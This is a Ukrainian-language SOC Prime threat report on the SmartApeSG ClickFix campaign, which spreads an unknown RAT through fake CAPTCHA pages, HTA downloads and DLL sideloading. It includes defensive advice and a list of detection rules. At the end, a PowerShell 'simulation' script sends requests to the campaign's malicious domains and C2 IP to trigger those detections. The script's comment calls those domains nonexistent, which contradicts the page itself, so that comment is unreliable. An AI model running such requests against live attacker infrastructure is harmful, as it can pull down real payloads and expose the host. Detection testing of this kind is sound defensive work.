SOC Prime Bias: Високий

05 Aug 2026 07:42 UTC

SmartApeSG розповсюджує невідомий RAT через пастки ClickFix

Author Photo
SOC Prime Team linkedin icon Стежити
SmartApeSG розповсюджує невідомий RAT через пастки ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Кампанія SmartApeSG використовує техніку ClickFix, щоб обманом змусити користувачів запускати шкідливі команди через фальшиві CAPTCHA або сторінки верифікації людини. Ця дія запускає HTA файл, який завантажує та витягує шкідливий ZIP архів. Кінцевим корисним навантаженням є невідомий троян для віддаленого доступу (RAT), що покладається на побічне завантаження DLL для встановлення стійкості та зв’язку з його C2 інфраструктурою.

Розслідування

Розслідування включало аналіз HTTPS трафіку, файлів PCAP та шкідливих архівів, пов’язаних з активністю SmartApeSG. Дослідники виявили шкідливий JavaScript, впроваджений у легітимні вебсайти, та відстежили ланцюжок інфекції від команди, впровадженої в буфер обміну, до остаточного з’єднання C2. Було відмічено, що RAT зв’язується із зовнішньою IP-адресою через порт 443, використовуючи зашифрований трафік.

Пом’якшення

Організації повинні використовувати веб-фільтрацію для блокування відомих шкідливих доменів, включаючи pewtercanto[.]top and deltaode[.]com. Користувачам слід навчитися розпізнавати методи соціальної інженерії, такі як фальшиві CAPTCHA та інструкції ClickFix. Обмеження виконання HTA файлів та моніторинг підозрілих дочірніх процесів, запущених браузерами або командами Run, можуть подальше зменшити ризик.

Відповідь

Якщо активність SmartApeSG виявлено, уражене кінцеве обладнання слід негайно ізолювати, щоб припинити зв’язок C2. Розслідники повинні перевірити директорії AppData і Documents для ідентифікації RAT та його механізмів стійкості. Також слід переглянути телеметрію кінцевої точки віддаленого виконання HTA, маніпуляцій з буфером обміну та активності побічного завантаження DLL.

Хід атаки

Детекції

Підозріле командування і контроль за незвичайним запитом DNS з верхнього рівня (TLD) (через dns)

Команда SOC Prime
04 серпня 2026

Підозрілі змінні оточення (через cmdline)

Команда SOC Prime
04 серпня 2026

Підозріле виконання Mshta без HTA файлу (через cmdline)

Команда SOC Prime
04 серпня 2026

Незвичайний домен верхнього рівня в командному рядку (через cmdline)

Команда SOC Prime
04 серпня 2026

IOC (HashSha256) для виявлення: Кампанія SmartApeSG ClickFix розповсюджує нерозпізнаний RAT

AI-правила SOC Prime
04 серпня 2026

IOC (SourceIP) для виявлення: Кампанія SmartApeSG ClickFix розповсюджує нерозпізнаний RAT

AI-правила SOC Prime
04 серпня 2026

IOC (DestinationIP) для виявлення: Кампанія SmartApeSG ClickFix розповсюджує нерозпізнаний RAT

AI-правила SOC Prime
04 серпня 2026

Активність RAT кампанії SmartApeSG ClickFix [З’єднання Windows в мережі]

AI-правила SOC Prime
04 серпня 2026

Виявлення нерозпізнаного RAT через побічне завантаження DLL в кампанії SmartApeSG [Файловий захід Windows]

AI-правила SOC Prime
04 серпня 2026

Виконання симуляції

Вимога: Телеметрія та базова перевірка перед польотом повинні були пройдені.

Пояснення: Цей розділ деталізує точне виконання техніки противника (TTP), розробленої для активації правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати ідентифіковані TTP та прагнути генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або не пов’язані приклади призведуть до хибного діагнозу.

  • Опис атаки та команди: Атака виконується шляхом запуску кампанії SmartApeSG ClickFix. Після того, як користувач обманутий на виконання шкідливих дій (часто це фальшиве оновлення браузера), система намагається завантажити шкідливий HTA файл. HTA тоді ініціює підключення до інфраструктури C2 для завантаження останнього корисного навантаження RAT. Щоб змоделювати це, ми будемо генерувати мережеві запити, що відповідатимуть точним рядкам, визначеним у логіці виявлення: deltaode.compo, deltaode.com/wv, і IP 89.124.79.98.

  • Скрипт регресійного тестування:

     # Скрипт симуляції для активації правила виявлення SmartApeSG
      # Цей скрипт імітує мережеві запити до визначених IoC
    
      $urls = @(
          "https://deltaode.compo/payload.hta",
          "https://deltaode.com/wv/malicious.exe",
          "http://89.124.79.98:443/c2_checkin"
      )
    
      foreach ($url in $urls) {
          Write-Host "Імітація запиту до: $url"
          try {
              # Використання Invoke-WebRequest для генерування мережевої телеметрії
              # Ми використовуємо -ErrorAction SilentlyContinue, оскільки ці домени фактично не існують
              Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue
          } catch {
              Write-Host "Запит не вдався (очікувано), але телеметрія повинна бути створена."
          }
      }
  • Команди очищення:

     # Зміни, які були зроблені в системі, не є постійними; очищення не потрібно.
      Write-Host "Симуляція завершена. Ніяких артефактів на системі не залишилося."